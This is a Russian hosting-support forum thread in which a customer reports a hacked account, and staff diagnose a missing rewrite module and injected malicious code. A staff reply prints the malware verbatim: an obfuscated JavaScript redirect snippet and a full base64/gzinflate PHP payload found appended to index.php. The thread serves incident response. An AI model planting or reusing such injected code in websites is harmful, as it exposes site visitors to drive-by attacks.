Мой аккаунт был взломан, с сайтом неполадки!

Вопросы о том как и что сделать чтобы работало
Правила форума
1. Один вопрос - одна тема. Не надо задавать в той же теме другие вопросы.
2. Не пишите в чужих темах, если ваша проблема не имеет отношения к обсуждаемой.
3. Давайте полное описание проблемы - имя сайта, имя сервера, учётная запись, способ воспроизведения, скриншот ошибки.
4. Пароли выкладывать в форум - НЕ НАДО
Андрей

Мой аккаунт был взломан, с сайтом неполадки!

Сообщение Андрей » 2018-03-14, 13:48:32

Сегодня узнал, что мой аккаунт на хостинге был взломан кем-то. Скорее всего кто-то узнал мой пароль для входа в биллинговую систему и там узнал пароль для входа на сервер, инф. для доступа к фтп и т.д. (кроме пароля к базе данных). Естественно, что все пароли (и к тому и к другому) я поменял на гораздо более сложные. Однако с на сайте невозможно просмотреть ни одной новости, поскольку при нажатии на ссылку мгновенно выдается 404 ошибка. Прошу помочь мне в решении проблемы или подсказать в чем она заключается...

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги нашей хостинговой компании

Хостинг HostFood.ru

Тарифы на хостинг, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM), от 189 рублей: https://www.host-food.ru/tariffs/virtualny-server-vps/
Тарифы на выделенные сервера (Dedicated Server), от 1560 рублей: https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах, от 110 рублей: https://www.host-food.ru/domains/
Часто задаваемые вопросы по хостингу: https://www.host-food.ru/faq/
Вопросы по доменам: https://www.host-food.ru/faq/domains.questions/

Испанюк Николай

Мой аккаунт был взломан, с сайтом неполадки!

Сообщение Испанюк Николай » 2018-03-14, 13:48:32

Здравствуйте.

У Вас не настроен Rewrite модуль ( дает возможность использовать ЧПУ ).

Все данные на месте.

Испанюк Николай

Мой аккаунт был взломан, с сайтом неполадки!

Сообщение Испанюк Николай » 2018-03-14, 13:48:32

Хотя модификация кода движка все таки была.

Т.к. в самом незу страницы находиться код

Код: Выделить всё

<script>var s='';try{new asd[0]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)t=2;e=eval;m=[4.5*t,18/..............6/t,23*t,194/t,56*t,224/t,50.5*t,220/t,50*t,134/t,52*t,210/t,54*t,200/t,20*t,204/t,20.5*t,118/t,4.5*t,18/t,62.5*t];mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}</script>
Который предположительно создает ссылку:
goo gle-ba nking.com/main.php?page=f8a892dc63e25f27 ( не переходит по ней, может быть опасно для Вашего ПК ).

Испанюк Николай

Мой аккаунт был взломан, с сайтом неполадки!

Сообщение Испанюк Николай » 2018-03-14, 13:48:32

В самом низу index.php был обнаружен следующий код:

Код: Выделить всё

#b710e0#
echo(gzinflate(base64_decode("1VfBcpswEP2V1odg1xlHWoGAIfSSey/tzeMDY5OYGWOnmKTtZPLvNbtCWgxO7UwuPdgjxEr7tPv2rbjdL6visf76nFWf9qnnJXX152Wb//qU7VdzsXhdZvVyPf45eSnuD/9VKpNl+r2uiu1D8nqYqq6uVrvlU5lv69myyrM6/5H/rr/tVvmkTiHJ0/w52yRlOvdnwZf6WkY39XUAOAbhHx6kPgwj0UyLZhLgMPRjslCNReAb8+ZNQPPNEBTOalw6c/PK2Ev+hhybB0B3Ea5ohgp38tEzNChj9CsJctDs40f9fRC1JKgyRm+Bgdq80WQVNitAmOMjcB+H2s2Djz5ciNojIFCJmKMTKOgNNMGj3ePeNoFoA22C6Nujm010c2Atj1caP+/Ji8KloTtFZG0Rq27eK3HuKRFgELITGywSgZksgIhcZhFWc2iJTACFJjy1dCibNG1DQzCBZbbFRNRRPD1uMZ5cxhHbFM8Aij3Y09nFsUVq8CNo0HbYwYzYlGAlBJE1oqHEoWNiGyrcHQK2D9C8bhMg0R5Cx1yijerULctn5MAQ0YkUGDOTFEodOKoAjze4uj1nm5AVuhb9Qu/SQWnmj/jOk9q+kR0ztrWUDqN0GiXEsZiYogPwWe65Q0NH6PDOejCcMKhCbuS7emMVFA9InLBGhvAoM9JVBBxXhDNoVQzxY1US57hSYzEbLvLSV7It51bljhVEQ0+SDFgWQqstw4HSZ+PBedTmf6ir6hS2I7vrS4ZN2iU9MImKGPwTvSXmignMxmB26bykY/Gmc5Zyhr3M4AISnZDHDamjxJGCOgn340EuitbJkDyTd7AmrtwNJ1Gq4pZwrVIK3k2JBLIfo9iiMiElC84UChyt7SYEHG84h2TcW04NDZyMUZVIVvJt4EVPikhWJbAqxwcwD8LKCpEKkNWUEMFMQHPFp30YFXjrNzbKaVBk7ze8v6kPkciB/tvpE6J7RyBCvAPo5dLKkVFaDYMFb9CaVbKC47p5B9BToszh8MZ2qihP9rgYhiT90u0/qOY7SiRYOvrFP9DU36Zt51bfSXbkNLXD1oE8dgRTcFGVgl+rbJ+8DPXH3Jb/868Y5dxpV6sdnKhwyj+6TvnWDwhHgTevEYukLNPl3Luvdt7UK+/WWXV3+Nz0Fsn9rhoXqUiKz2k52+Tbh3qdFNPpZD9Ny3Kcj0flaDqaH37FaOotvMkEv3Xt52v2+JhvV3frYrMab582m4n79s3H+0nyentjvpX/Ag==")));
#/b710e0#
Который и генерирует как раз выше представленный JavaScript. Который в свою очередь ссылаеться на сайт который пытается атаковать ПК.

Будьте бдительны, не сообщайте свои пароли никому постороннему и ставьте сложные пароли.

Советуем так же поменять пароль от E-mail.

Обнаруженный вредоносный код - удален.

Андрей

Мой аккаунт был взломан, с сайтом неполадки!

Сообщение Андрей » 2018-03-14, 13:48:32

как возможно прописать данный код в файле? И как захлопнуть эту дыру?

Испанюк Николай

Мой аккаунт был взломан, с сайтом неполадки!

Сообщение Испанюк Николай » 2018-03-14, 13:48:32

1. Получив доступ либо к FTP, либо к панели управления.
2. Поменять все пароли на более сложные.